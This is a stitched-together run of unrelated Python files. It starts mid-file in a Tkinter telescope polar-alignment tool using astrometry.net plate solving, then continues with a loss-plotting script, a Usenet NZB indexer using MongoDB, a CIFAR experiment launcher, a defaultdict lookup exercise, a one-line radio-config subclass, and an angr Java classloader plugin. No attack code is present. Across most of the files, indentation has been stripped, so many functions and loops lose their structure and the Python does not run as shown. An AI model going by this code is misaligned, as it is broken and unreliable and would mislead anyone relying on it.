self.wvar1.configure(text=basename(img))
self.wvfn.configure(bg='green', activebackground='green')
elif hint == 'h':
self.himg_fn = img
self.hwcs_fn = wcs
self.haveh = True
self.wvar2.configure(text=basename(img))
self.whfn.configure(bg='green', activebackground='green')
elif hint == 'i':
self.iimg_fn = img
self.iwcs_fn = wcs
self.havei = True
self.wvar3.configure(text=basename(img))
self.wifn.configure(bg='green', activebackground='green')
def update_scale(self, hint):
try:
if hint == 'v':
self.scale = scale_frm_wcs(self.vwcs_fn)
elif hint == 'h':
self.scale = scale_frm_wcs(self.hwcs_fn)
elif hint == 'i':
self.scale = scale_frm_wcs(self.iwcs_fn)
self.havescale = True
self.wvar5.configure(text=('%.2f' % self.scale))
except:
self.havescale = False
self.wvar5.configure(text='--.--')
return
def solve(self, hint, solver):
'''
Solve an image
'''
if hint == 'h' or hint == 'v':
if self.vimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
if hint == 'h':
aimg = self.himg_fn
awcs = self.hwcs_fn
if hint == 'v':
aimg = self.vimg_fn
awcs = self.vwcs_fn
if hint == 'i':
aimg = self.iimg_fn
awcs = self.iwcs_fn
try:
open(aimg)
except IOError:
stat_bar(self, ("couldn't open the image - Check the Image " +
'filename' + aimg))
return
stat_bar(self, 'Solving image...')
if solver=='nova':
img2wcs(self, self.apikey.get(), aimg, awcs, hint)
if solver=='local':
limg2wcs(self, aimg, awcs, hint)
self.update_scale(hint)
def update_display(self, cpcrd, the_scale):
'''
update Computed displayed quantities
'''
import numpy
axis = self.axis
x1a = axis[0]
y1a = axis[1]
x2a = cpcrd[0][0]
y2a = cpcrd[0][1]
self.scale = the_scale
self.havescale = True
self.wvar5.configure(text=('%.2f' % the_scale))
self.wvar6.configure(text=str(int(x1a))+','+str(int(y1a)))
self.wvar7.configure(text=(str(int(x2a)) +',' + str(int(y2a))))
err = the_scale*numpy.sqrt((x1a-x2a)**2 + (y1a-y2a)**2)/60.0
self.wvar8.configure(text=('%.2f' % err))
if x2a > x1a:
inst = 'Right '
else:
inst = 'Left '
ddeg = abs(x2a - x1a)*the_scale/3600.0
inst = inst + ('%02d:%02d:%02d' % decdeg2dms(ddeg))
self.wvar9.configure(text=inst)
if y2a > y1a:
inst = inst + ' Down '
else:
inst = inst + ' Up '
ddeg = abs(y2a - y1a)*the_scale/3600.0
inst = inst + ('%02d:%02d:%02d' % decdeg2dms(ddeg))
self.wvar9.configure(text=inst)
def annotate_imp(self):
'''
Annotate the improvement image
'''
from PIL import Image
from astropy.time import Time
from astropy.coordinates import SkyCoord
from astropy.coordinates import FK5
from astropy.io import fits
from astropy import wcs
import numpy
from os.path import splitext
if self.iimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
try:
imi = Image.open(self.iimg_fn)
# Load the FITS hdulist using astropy.io.fits
hdulisti = fits.open(self.iwcs_fn)
hdulisth = fits.open(self.hwcs_fn)
except IOError:
return
axis = self.axis
try:
axis[0]
except:
stat_bar(self,"don't know where Polar Axis is - Find Polar Axis")
return
stat_bar(self, 'Annotating...')
headi = hdulisti[0].header
headh = hdulisth[0].header
wcsi = wcs.WCS(headi)
now = Time.now()
if self.hemi == 'N':
cp = SkyCoord(ra=0, dec=90, frame='fk5', unit='deg', equinox=now)
else:
cp = SkyCoord(ra=0, dec=-90, frame='fk5', unit='deg', equinox=now)
cpj2000 = cp.transform_to(FK5(equinox='J2000'))
cpskycrd = numpy.array([[cpj2000.ra.deg, cpj2000.dec.deg]],
numpy.float_)
cpcrdi = wcsi.wcs_world2pix(cpskycrd, 1)
scalei = scale_frm_header(headi)
widthi, heighti = wid_hei_frm_header(headi)
if wid_hei_frm_header(headi) != wid_hei_frm_header(headh) :
stat_bar(self,'Incompatible image dimensions...')
return
if parity_frm_header(headi) == 0 :
stat_bar(self,'Wrong parity...')
return
self.update_display(cpcrdi, scalei)
cpcircle(cpcrdi, imi, scalei)
cross([axis], imi, 'Red')
if self.hemi == 'N':
poli = wcsi.wcs_world2pix(self.polaris, 1)
lami = wcsi.wcs_world2pix(self.lam, 1)
circle(poli, imi, 'White', 'a')
circle(lami, imi, 'Orange', 'l')
left = int(min(cpcrdi[0][0], poli[0][0], lami[0][0], axis[0]))
right = int(max(cpcrdi[0][0], poli[0][0], lami[0][0], axis[0]))
bottom = int(min(cpcrdi[0][1], poli[0][1], lami[0][1], axis[1]))
top = int(max(cpcrdi[0][1], poli[0][1], lami[0][1], axis[1]))
else:
ori = wcsi.wcs_world2pix(self.chi, 1)
whi = wcsi.wcs_world2pix(self.sigma, 1)
rei = wcsi.wcs_world2pix(self.red, 1)
circle(whi, imi, 'White', 's')
circle(ori, imi, 'Orange', 'c')
circle(rei, imi, 'Red', '!')
left = int(min(cpcrdi[0][0], ori[0][0], whi[0][0], axis[0]))
right = int(max(cpcrdi[0][0], ori[0][0], whi[0][0], axis[0]))
bottom = int(min(cpcrdi[0][1], ori[0][1], whi[0][1], axis[1]))
top = int(max(cpcrdi[0][1], ori[0][1], whi[0][1], axis[1]))
margin = int(2500/scalei)
xl = max(1, left - margin)
xr = min(widthi, right + margin)
yt = min(heighti, top + margin)
yb = max(1, bottom - margin)
croppedi = imi.crop((xl, yb, xr, yt))
croppedi.load()
crop_fn = splitext(self.iimg_fn)[0] + '_cropi.ppm'
croppedi.save(crop_fn, 'PPM')
self.create_imgwin(crop_fn, self.iimg_fn)
stat_bar(self, 'Idle')
def annotate(self):
'''
Find RA axis and Annotate the pair of horiz/vertical images
'''
from PIL import Image
from astropy.time import Time
import scipy.optimize
from astropy.coordinates import SkyCoord
from astropy.coordinates import FK5
from astropy.io import fits
from astropy import wcs
import numpy
from os.path import splitext
#
if self.vimg_fn == self.himg_fn:
stat_bar(self, ('Image filenames coincide - Check the Image ' +
'filenames'))
return
try:
imh = Image.open(self.himg_fn)
# Load the FITS hdulist using astropy.io.fits
hdulistv = fits.open(self.vwcs_fn)
hdulisth = fits.open(self.hwcs_fn)
except IOError:
return
stat_bar(self, 'Finding RA axis...')
# Parse the WCS keywords in the primary HDU
headv = hdulistv[0].header
headh = hdulisth[0].header
wcsv = wcs.WCS(headv)
wcsh = wcs.WCS(headh)
decv = dec_frm_header(headv)
dech = dec_frm_header(headh)
if decv > 65 and dech > 65:
self.hemi = 'N'
elif decv < -65 and dech < -65:
self.hemi = 'S'
else:
stat_bar(self, 'Nowhere near (>25 deg) the Poles!')
return
now = Time.now()
if self.hemi == 'N':
cp = SkyCoord(ra=0, dec=90, frame='fk5', unit='deg', equinox=now)
else:
cp = SkyCoord(ra=0, dec=-90, frame='fk5', unit='deg', equinox=now)
# CP now, in J2000 coordinates, precess
cpj2000 = cp.transform_to(FK5(equinox='J2000'))
# sky coordinates
cpskycrd = numpy.array([[cpj2000.ra.deg, cpj2000.dec.deg]],
numpy.float_)
# pixel coordinates
cpcrdh = wcsh.wcs_world2pix(cpskycrd, 1)
if self.hemi == 'N':
print 'Northern Celestial Pole', dech
else:
print 'Southern Celestial Pole', dech
scaleh = scale_frm_header(headh)
widthh, heighth = wid_hei_frm_header(headh)
if wid_hei_frm_header(headh) != wid_hei_frm_header(headv):
stat_bar(self, 'Incompatible image dimensions...')
return
if parity_frm_header(headh) == 0 or parity_frm_header(headv) == 0 :
stat_bar(self, 'Wrong parity...')
return
def displacement(coords):
'''
the movement of a sky object in the two images
'''
pixcrd1 = numpy.array([coords], numpy.float_)
skycrd = wcsv.wcs_pix2world(pixcrd1, 1)
pixcrd2 = wcsh.wcs_world2pix(skycrd, 1)
return pixcrd2 - pixcrd1
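        # The RA axis is the point whose pixel coordinates are unchanged between
        # the two plate solutions, i.e. a zero of displacement(); Broyden's method
        # finds that fixed point numerically, starting from the image centre.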
axis = scipy.optimize.broyden1(displacement, [widthh/2, heighth/2])
self.axis = axis
self.update_display(cpcrdh, scaleh)
#
stat_bar(self, 'Annotating...')
cpcircle(cpcrdh, imh, scaleh)
cross([axis], imh, 'Red')
# add reference stars
if self.hemi == 'N':
polh = wcsh.wcs_world2pix(self.polaris, 1)
lamh = wcsh.wcs_world2pix(self.lam, 1)
circle(polh, imh, 'White', 'a')
circle(lamh, imh, 'Orange', 'l')
left = int(min(cpcrdh[0][0], polh[0][0], lamh[0][0], axis[0]))
right = int(max(cpcrdh[0][0], polh[0][0], lamh[0][0], axis[0]))
bottom = int(min(cpcrdh[0][1], polh[0][1], lamh[0][1], axis[1]))
top = int(max(cpcrdh[0][1], polh[0][1], lamh[0][1], axis[1]))
else:
orh = wcsh.wcs_world2pix(self.chi, 1)
whh = wcsh.wcs_world2pix(self.sigma, 1)
reh = wcsh.wcs_world2pix(self.red, 1)
circle(whh, imh, 'White', 's')
circle(orh, imh, 'Orange', 'c')
circle(reh, imh, 'Red', '!')
left = int(min(cpcrdh[0][0], orh[0][0], whh[0][0], axis[0]))
right = int(max(cpcrdh[0][0], orh[0][0], whh[0][0], axis[0]))
bottom = int(min(cpcrdh[0][1], orh[0][1], whh[0][1], axis[1]))
top = int(max(cpcrdh[0][1], orh[0][1], whh[0][1], axis[1]))
margin = int(2500/scaleh)
xl = max(1, left - margin)
xr = min(widthh, right + margin)
yt = min(heighth, top + margin)
yb = max(1, bottom - margin)
croppedh = imh.crop((xl, yb, xr, yt))
croppedh.load()
crop_fn = splitext(self.himg_fn)[0] + '_croph.ppm'
croppedh.save(crop_fn, 'PPM')
self.create_imgwin(crop_fn, self.himg_fn)
stat_bar(self, 'Idle')
def create_imgwin(self, img_fn, title):
'''
creates a window to display an image
'''
from os.path import basename
# create child window
img = PhotoImage(file=img_fn)
win = Toplevel()
wwid = min(800, img.width())
whei = min(800, img.height())
win.geometry(('%dx%d' % (wwid+28, whei+28)))
win.title(basename(title))
frame = Frame(win, bd=0)
frame.pack()
xscrollbar = Scrollbar(frame, orient='horizontal')
xscrollbar.pack(side='bottom', fill='x')
yscrollbar = Scrollbar(frame, orient='vertical')
yscrollbar.pack(side='right', fill='y')
canvas = Canvas(frame, bd=0, width=wwid, height=whei,
scrollregion=(0, 0, img.width(), img.height()),
xscrollcommand=xscrollbar.set,
yscrollcommand=yscrollbar.set)
canvas.pack(side='top', fill='both', expand=1)
canvas.create_image(0, 0, image=img, anchor='nw')
xscrollbar.config(command=canvas.xview)
yscrollbar.config(command=canvas.yview)
frame.pack()
# next statement is important! creates reference to img
canvas.img = img
def update_solved_labels(self, hint, sta):
'''
updates displayed Solved labels
'''
if hint == 'v':
widget = self.wvok
elif hint == 'h':
widget = self.whok
elif hint == 'i':
widget = self.wiok
# oldstate = widget.config()['state'][4]
if (sta == 'active'):
widget.configure(state='active', bg='green',
activebackground='green',
highlightbackground='green')
elif (sta == 'disabled'):
widget.configure(state='disabled', bg='red',
activebackground='red',
highlightbackground='red')
widget.update()
def slurpAT(self):
import tkFileDialog
import ConfigParser
stat_bar(self,'Reading...')
options = {}
options['filetypes'] = [('Config files', '.cfg'),
('all files', '.*')]
options['initialdir'] = self.imgdir
options['title'] = 'The AstroTortilla configuration file'
cfg_fn = tkFileDialog.askopenfilename(**options)
config = ConfigParser.SafeConfigParser()
config.read(cfg_fn)
for s in config.sections():
if s == 'Solver-AstrometryNetSolver':
for o in config.options(s):
if o == 'configfile':
self.local_configfile.set(config.get(s,o, None))
elif o == 'shell':
self.local_shell.set(config.get(s,o, None))
elif o == 'downscale':
self.local_downscale.set(config.get(s,o, None))
elif o == 'scale_units':
self.local_scale_units.set(config.get(s,o,None))
elif o == 'scale_low':
self.local_scale_low.set(config.get(s,o,None))
elif o == 'scale_max':
self.local_scale_hi.set(config.get(s,o, None))
elif o == 'xtra':
self.local_xtra.set(config.get(s,o,None))
stat_bar(self,'Idle')
return
def create_widgets(self, master=None):
'''
creates the main window components
'''
self.myparent = master
self.myparent.title('Photo Polar Alignment')
#
self.menubar = Menu(master)
self.filemenu = Menu(self.menubar, tearoff=0)
self.helpmenu = Menu(self.menubar, tearoff=0)
self.menubar.add_cascade(label='File', menu=self.filemenu)
self.menubar.add_cascade(label='Help', menu=self.helpmenu)
self.filemenu.add_command(label='Settings...',
command=self.settings_open)
self.filemenu.add_command(label='Exit', command=self.quit_method)
self.helpmenu.add_command(label='Help', command=help_f)
self.helpmenu.add_command(label='About...', command=about_f)
self.myparent.config(menu=self.menubar)
# #################################################################
self.wfrop = LabelFrame(master, text='Operations')
self.wfrop.pack(side='top', fill='x')
#
nxt = Button(self.wfrop, image=self.vicon, command=lambda : self.get_file('v'))
nxt.grid(row=0, column=0, sticky='ew', padx=10, pady=4, rowspan=3)
self.wvfn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('v','nova'))
nxt.grid(row=0, column=1, sticky='ew', padx=10, pady=4)
self.wvsol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('v','local'))
nxt.grid(row=1, column=1, sticky='ew', padx=10, pady=4)
self.wlvsol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=2, column=1, sticky='ew', padx=10, pady=4)
self.wvok = nxt
#
nxt = Button(self.wfrop, image=self.hicon, command=lambda : self.get_file('h'))
nxt.grid(row=3, column=0, sticky='ew', padx=10, pady=4, rowspan=3)
self.whfn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('h','nova'))
nxt.grid(row=3, column=1, sticky='ew', padx=10, pady=4)
self.whsol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('h','local'))
nxt.grid(row=4, column=1, sticky='ew', padx=10, pady=4)
self.wlhsol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=5, column=1, sticky='ew', padx=10, pady=4)
self.whok = nxt
#
nxt = Button(self.wfrop, text='Find Polar Axis',
command=self.annotate)
nxt.grid(row=6, column=0, sticky='ew', padx=10, pady=4, columnspan=2)
self.wann = nxt
#
nxt = Button(self.wfrop, image=self.iicon, command=lambda : self.get_file('i'))
nxt.grid(row=3, column=3, sticky='ew', padx=10, pady=4, rowspan=3)
self.wifn = nxt
nxt = Button(self.wfrop, text='Nova', command=lambda : self.solve('i','nova'))
nxt.grid(row=3, column=4, sticky='ew', padx=10, pady=4)
self.wisol = nxt
nxt = Button(self.wfrop, text='Local', command=lambda : self.solve('i','local'))
nxt.grid(row=4, column=4, sticky='ew', padx=10, pady=4)
self.wlisol = nxt
nxt = Label(self.wfrop, text='Solved', state='disabled')
nxt.grid(row=5, column=4, sticky='ew', padx=10, pady=4)
self.wiok = nxt
#
nxt = Button(self.wfrop, text='Show Improvement',
command=self.annotate_imp)
nxt.grid(row=6, column=3, sticky='ew', padx=10, pady=4, columnspan=2)
self.wanni = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge',
text='Info')
nxt.pack(side='top', fill='x')
self.wfrvar = nxt
nxt = Label(self.wfrvar, text = 'Given')
nxt.grid(row=0, column=1, columnspan=2, sticky='w')
nxt = Label(self.wfrvar, anchor='w', text='Vertical:')
nxt.grid(row=1, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=1, column=1, sticky='e')
self.wvar1 = nxt
nxt = Label(self.wfrvar, text='Horizontal:')
nxt.grid(row=2, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=2, column=1, sticky='e')
self.wvar2 = nxt
nxt = Label(self.wfrvar, text='Improved:')
nxt.grid(row=3, column=0, sticky='w')
nxt = Label(self.wfrvar, text='---------')
nxt.grid(row=3, column=1, sticky='e')
self.wvar3 = nxt
nxt = Label(self.wfrvar, text='API key:')
nxt.grid(row=4, column=0, sticky='w')
nxt = Label(self.wfrvar, text=('%.3s...........' % self.apikey.get()))
nxt.grid(row=4, column=1, sticky='e')
self.wvar4 = nxt
nxt = Label(self.wfrvar, text = 'Computed')
nxt.grid(row=0, column=3, columnspan=2, sticky='w')
nxt = Label(self.wfrvar, text='Scale (arcsec/pixel):')
nxt.grid(row=1, column=2, sticky='w')
if self.havescale:
nxt = Label(self.wfrvar, text=self.scale)
else:
nxt = Label(self.wfrvar, text='--.--')
nxt.grid(row=1, column=3, sticky='e')
self.wvar5 = nxt
nxt = Label(self.wfrvar, text='RA axis position:')
nxt.grid(row=2, column=2, sticky='w')
nxt = Label(self.wfrvar, text='---,---')
nxt.grid(row=2, column=3, sticky='e')
self.wvar6 = nxt
nxt = Label(self.wfrvar, text='CP position:')
nxt.grid(row=3, column=2, sticky='w')
nxt = Label(self.wfrvar, text='---,---')
nxt.grid(row=3, column=3, sticky='e')
self.wvar7 = nxt
nxt = Label(self.wfrvar, text='Error (arcmin):')
nxt.grid(row=4, column=2, sticky='w')
nxt = Label(self.wfrvar, text='--.--')
nxt.grid(row=4, column=3, sticky='e')
self.wvar8 = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge',
text='Move (dd:mm:ss)')
nxt.pack(side='top', fill='x')
self.wfrmo = nxt
nxt = Label(self.wfrmo, anchor='center', font='-weight bold -size 14')
nxt.pack(anchor='center')
self.wvar9 = nxt
# #################################################################
nxt = LabelFrame(master, borderwidth=2, relief='ridge', text='Status')
nxt.pack(side='bottom', fill='x')
self.wfrst = nxt
nxt = Label(self.wfrst, anchor='w', text=self.stat_msg)
nxt.pack(anchor='w')
self.wstat = nxt
def __init__(self, master=None):
import ConfigParser
import numpy
import os
# a F8Ib 2.0 mag star, Alpha Ursa Minoris
self.polaris = numpy.array([[037.954561, 89.264109]], numpy.float_)
#
# a M1III 6.4 mag star, Lambda Ursa Minoris
self.lam = numpy.array([[259.235229, 89.037706]], numpy.float_)
#
# a F0III 5.4 mag star, Sigma Octans
self.sigma = numpy.array([[317.195164, -88.956499]], numpy.float_)
#
# a K3IIICN 5.3 mag star, Chi Octans
self.chi = numpy.array([[283.696388, -87.605843]], numpy.float_)
#
# a M1III 7.2 mag star, HD90104
self.red = numpy.array([[130.522862, -89.460536]], numpy.float_)
#
# the pixel coords of the RA axis, if solution exists
self.axis = None
self.havea = False
# the Settings window
self.settings_win = None
# the User preferences file
self.cfgfn = 'PPA.ini'
self.local_shell = StringVar()
self.local_downscale = IntVar()
self.local_configfile = StringVar()
self.local_scale_units = StringVar()
self.local_scale_low = DoubleVar()
self.local_scale_hi = DoubleVar()
self.local_xtra = StringVar()
# Read the User preferences
self.config = ConfigParser.ConfigParser()
self.config.read(self.cfgfn)
# ...the key
try:
k_ini = self.config.get('nova', 'apikey', None)
except :
k_ini = None
self.apikey = StringVar(value=k_ini)
# ...the Image directory
try:
self.imgdir = self.config.get('file', 'imgdir', None)
except :
self.imgdir = None
# ...geometry
try:
self.usergeo = self.config.get('appearance', 'geometry', None)
except :
self.usergeo = None
master.geometry(self.usergeo)
# do we want to help solves by restricting the scale once we have an estimate
self.restrict_scale = IntVar(0)
try:
self.restrict_scale.set(self.config.get('operations','restrict scale', 0))
except:
self.restrict_scale.set(0)
# the filenames of images
self.vimg_fn = ''
self.havev = False
self.himg_fn = ''
self.haveh = False
self.iimg_fn = ''
self.havei = False
# the filenames of the .wcs solutions
self.vwcs_fn = ''
self.hwcs_fn = ''
self.iwcs_fn = ''
# the button icons
self.vicon = PhotoImage(file='v2_2.ppm')
self.hicon = PhotoImage(file='h2_2.ppm')
self.iicon = PhotoImage(file='i2_2.ppm')
# the solved image scale
self.havescale = False
self.scale = None
# the discovered hemisphere
self.hemi = None
# initialise attributes set elsewhere
self.menubar = None
self.helpmenu = None
self.filemenu = None
self.wfrop = None
self.wvfn = None
self.wvsol = None
self.wlvsol = None
self.wvok = None
self.whfn = None
self.whsol = None
self.wlhsol = None
self.whok = None
self.wifn = None
self.wisol = None
self.wlisol = None
self.wiok = None
self.wann = None
self.wanni = None
self.wfr2 = None
self.wfrvar = None
self.wvar1 = None
self.wvar2 = None
self.wvar3 = None
self.wvar4 = None
self.wfrcomp = None
self.wvar5 = None
self.wvar6 = None
self.wvar7 = None
self.wvar8 = None
self.wfrmo = None
self.wvar9 = None
self.wfrst = None
self.wstat = None
self.myparent = None
self.stat_msg = 'Idle'
Frame.__init__(self, master)
self.create_widgets(master)
# check local solver
self.wlvsol.configure(state='disabled')
self.wlhsol.configure(state='disabled')
self.wlisol.configure(state='disabled')
try:
self.local_shell.set(self.config.get('local','shell',''))
self.local_downscale.set(self.config.get('local','downscale',1))
self.local_configfile.set(self.config.get('local','configfile',''))
self.local_scale_units.set(self.config.get('local','scale_units',''))
self.local_scale_low.set(self.config.get('local','scale_low',0))
self.local_scale_hi.set(self.config.get('local','scale_hi',0))
self.local_xtra.set(self.config.get('local','xtra',''))
# check solve-field cmd
exit_status = os.system(self.local_shell.get() % 'solve-field > /dev/null')
if exit_status != 0:
print "Can't use local astrometry.net solver, check PATH"
else:
self.wlvsol.configure(state='active')
self.wlhsol.configure(state='active')
self.wlisol.configure(state='active')
except:
self.local_shell.set('')
self.local_downscale.set(1)
self.local_configfile.set('')
self.local_scale_units.set('')
self.local_scale_low.set(0)
self.local_scale_hi.set(0)
self.local_xtra.set('')
if not self.apikey.get() or self.apikey.get()=='':
self.settings_open()
self.pack()
#
ROOT = Tk()
ROOT.geometry('440x470+300+300')
APP = PhotoPolarAlign(master=ROOT)
ROOT.mainloop()
|
from matplotlib import pyplot as plt
def get_losses(log_file, filter_text):
    with open(log_file) as f:
        lines = f.readlines()
    begin_line, end_line = None, len(lines)
    for idx, content in enumerate(lines):
        if content.startswith(filter_text):
            begin_line = idx
            break
    if begin_line is None:
        # filter text not found in the log - nothing to collect
        return []
    losses = []
for line in range(begin_line+1, end_line):
content = lines[line]
if 'Iter' not in content:
continue
if 'val' in content:
continue
loss = content.split(':')[-1].strip()
losses.append(float(loss))
return losses
if __name__ == '__main__':
log_file_transformer = 'workspace/VSRTransformer/result/transformer.log'
log_file_basicVSR = 'workspace/VSRTransformer/result/basicvsr.log'
text_transformer = '2021-08-04 16:28:37,527 - mmedit - INFO - workflow:'
text_basicVSR = '2021-07-24 15:20:51,512 - mmedit - INFO - workflow'
losses_transformer = get_losses(log_file_transformer, text_transformer)
losses_basicVSR = get_losses(log_file_basicVSR, text_basicVSR)
ckpt_interval = 50
    # find the checkpoint (sampled every ckpt_interval iterations) with the lowest basicVSR loss
    min_loss = 10
    idx = 0
    for i in range(ckpt_interval-1,len(losses_basicVSR),ckpt_interval):
        if losses_basicVSR[i] < min_loss:
            min_loss = losses_basicVSR[i]
            idx = i
    print(idx, min_loss)
plt.plot([_ for _ in range(len(losses_transformer))], losses_transformer, 'b')
plt.plot([_ for _ in range(len(losses_basicVSR))], losses_basicVSR,'r')
plt.show()
|
# index.py
# Scott Metoyer, 2013
# Retrieves a list of new NZB's from the newsgroups specified in a config file
from nntplib import *
from pymongo import MongoClient
import string
import datetime
import time
try:
from config_local import config as config
except ImportError:
from config_default import config as config
mongo_connection = MongoClient('localhost', 27017)
db = mongo_connection.nzb_database
newsgroups = db.newsgroup_collection
articles = db.article_collection
def connect():
print('Connecting to ' + config["usenet_server"] + '...')
server = NNTP(config["usenet_server"], config["usenet_port"], config["usenet_username"], config["usenet_password"])
return server
def fetch_articles(group, start_index):
article_count = 0
server = connect()
print('Reading from group ' + group + '...')
resp, count, first, last, name = server.group(group)
print('Getting a list of nzb files in ' + group + '...')
if start_index < int(first):
start_index = int(first)
current_index = int(start_index)
last_index = int(last)
chunk_size = 10000
# Some sanity checking on the maximum number to process. If it's too many, we only grab the newest.
if last_index - current_index > config["max_run_size"]:
current_index = last_index - config["max_run_size"]
while (current_index < last_index):
if (current_index + chunk_size >= last_index):
chunk_size = last_index - current_index
try:
resp, items = server.xover(str(current_index), str(current_index + chunk_size))
except:
print("Error grabbing articles. Attempting to reconnect...")
server = connect()
server.group(group)
resp, items = server.xover(str(current_index), str(current_index + chunk_size))
print("Reconnected.")
for number, subject, poster, date, id, references, size, lines in items:
if '.nzb' in subject.lower():
                # Make sure this article doesn't already exist in the database
                if articles.find_one({"message-id": id}) is None:
article = {"message-id": id,
"group": group,
"article-number": number,
"subject": subject,
"date": date}
try:
articles.insert(article)
print(group + "," + number + ": " + subject)
article_count += 1
except:
print("Error inserting article. Continuing...")
else:
print("Article " + id + " already exists in the database. Continuing...")
current_index += chunk_size
server.quit()
print("Articles added: " + str(article_count))
return current_index
def get_group(group_name):
group = newsgroups.find_one({"name": group_name})
    if group is None:
group = {"name": group_name,
"last_scan": datetime.datetime.now(),
"last_article": 0}
newsgroups.insert(group)
return group
def update_group(group_name, last_article):
# Make sure the group exists
get_group(group_name)
newsgroups.update({"name": group_name},
{"$set": {
"last_scan": datetime.datetime.now(),
"last_article": last_article
}
})
# Grab groups to scan from configuration file
f = open("groups.txt", "r")
groups = (line.strip() for line in f.readlines() if len(line.strip()))
f.close()
print("Starting run...")
start = time.time()
for group_name in groups:
settings = get_group(group_name)
last_index = fetch_articles(group_name, settings["last_article"] + 1)
update_group(group_name, last_index)
end = time.time()
elapsed = end - start
print("Execution time: " + str(elapsed / 60) + " minutes") |
import os
def run_sgd_trained_experiment(gpu_id, cpu_list):
os.system("mkdir -p ./results/sgd8")
command = f"CUDA_VISIBLE_DEVICES={gpu_id} taskset -c {cpu_list} " \
f"python tools/cifar_bound_comparison.py " \
f"./networks/cifar_sgd_8px.pth 0.01960784313 ./results/sgd8 --from_intermediate_bounds"
print(command)
os.system(command)
def run_madry_trained_experiment(gpu_id, cpu_list):
os.system("mkdir -p ./results/madry8")
command = f"CUDA_VISIBLE_DEVICES={gpu_id} taskset -c {cpu_list} " \
f"python tools/cifar_bound_comparison.py " \
f"./networks/cifar_madry_8px.pth 0.04705882352 ./results/madry8 --from_intermediate_bounds"
print(command)
os.system(command)
if __name__ == "__main__":
gpu_id = 0
cpu_list = "0-3"
run_madry_trained_experiment(gpu_id, cpu_list)
run_sgd_trained_experiment(gpu_id, cpu_list)
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
from collections import defaultdict
def look_up_occurrence_index( word_index_dict:defaultdict, word:str)->None:
    look_up_result = word_index_dict[word]
    if len(look_up_result) != 0 :
        print(' '.join( map(str, look_up_result) ) )
else:
print(-1)
return
if __name__ == '__main__':
# key: string
# value: list of occurrence index, index starts counting from 1
word_index_dict = defaultdict( list )
buf = list( map( int, input().split() ) )
n, m = buf[0], buf[1]
for occ_idx in range(n):
word = input()
# update occurrence index of word
word_index_dict[word].append( occ_idx+1 )
for _ in range( m ):
word_of_look_up = input()
        look_up_occurrence_index( word_index_dict, word_of_look_up )
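# Worked example of the expected STDIN/STDOUT behaviour (hypothetical input,
# shown only to illustrate the dictionary-based lookup above):
#
#   3 2        n = 3 indexed words, m = 2 queries
#   a
#   b
#   a
#   a          -> occurs at positions 1 and 3, so "1 3" is printed
#   z          -> never indexed, so -1 is printed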
|
from pyradioconfig.parts.ocelot.calculators.calc_fec import CALC_FEC_Ocelot
class Calc_FEC_Bobcat(CALC_FEC_Ocelot):
pass |
import logging
from archinfo.arch_soot import (SootAddressDescriptor, SootAddressTerminator,
SootClassDescriptor)
from ..engines.soot.method_dispatcher import resolve_method
from ..engines import UberEngine
from ..sim_state import SimState
from .plugin import SimStatePlugin
l = logging.getLogger("angr.state_plugins.javavm_classloader")
class SimJavaVmClassloader(SimStatePlugin):
"""
JavaVM Classloader is used as an interface for resolving and initializing
Java classes.
"""
def __init__(self, initialized_classes=None):
super(SimJavaVmClassloader, self).__init__()
self._initialized_classes = set() if initialized_classes is None else initialized_classes
def get_class(self, class_name, init_class=False, step_func=None):
"""
Get a class descriptor for the class.
:param str class_name: Name of class.
:param bool init_class: Whether the class initializer <clinit> should be
executed.
:param func step_func: Callback function executed at every step of the simulation manager during
the execution of the main <clinit> method
"""
# try to get the soot class object from CLE
java_binary = self.state.javavm_registers.load('ip_binary')
soot_class = java_binary.get_soot_class(class_name, none_if_missing=True)
# create class descriptor
class_descriptor = SootClassDescriptor(class_name, soot_class)
# load/initialize class
if init_class:
self.init_class(class_descriptor, step_func=step_func)
return class_descriptor
def get_superclass(self, class_):
"""
Get the superclass of the class.
"""
if not class_.is_loaded or class_.superclass_name is None:
return None
return self.get_class(class_.superclass_name)
def get_class_hierarchy(self, base_class):
"""
Walks up the class hierarchy and returns a list of all classes between
base class (inclusive) and java.lang.Object (exclusive).
"""
classes = [base_class]
while classes[-1] is not None and classes[-1] != "java.lang.Object":
classes.append(self.get_superclass(classes[-1]))
return classes[:-1]
def is_class_initialized(self, class_):
"""
        Indicates whether the class' initializing method <clinit> was already
executed on the state.
"""
return class_ in self.initialized_classes
def init_class(self, class_, step_func=None):
"""
This method simulates the loading of a class by the JVM, during which
parts of the class (e.g. static fields) are initialized. For this, we
run the class initializer method <clinit> (if available) and update
the state accordingly.
Note: Initialization is skipped, if the class has already been
initialized (or if it's not loaded in CLE).
"""
if self.is_class_initialized(class_):
l.debug("Class %r already initialized.", class_)
return
l.debug("Initialize class %r.", class_)
self.initialized_classes.add(class_)
if not class_.is_loaded:
l.warning("Class %r is not loaded in CLE. Skip initializiation.", class_)
return
clinit_method = resolve_method(self.state, '<clinit>', class_.name,
include_superclasses=False, init_class=False)
if clinit_method.is_loaded:
engine = UberEngine(self.state.project)
# use a fresh engine, as the default engine instance may be in use at this time
javavm_simos = self.state.project.simos
clinit_state = javavm_simos.state_call(addr=SootAddressDescriptor(clinit_method, 0, 0),
base_state=self.state,
ret_addr=SootAddressTerminator())
simgr = self.state.project.factory.simgr(clinit_state)
l.info(">"*15 + " Run class initializer %r ... " + ">"*15, clinit_method)
simgr.run(step_func=step_func, engine=engine)
l.debug("<"*15 + " Run class initializer %r ... done " + "<"*15, clinit_method)
# The only thing that can be updated during initialization are
# static or rather global information, which are either stored on
# the heap or in the vm_static_table
self.state.memory.vm_static_table = simgr.deadended[-1].memory.vm_static_table.copy()
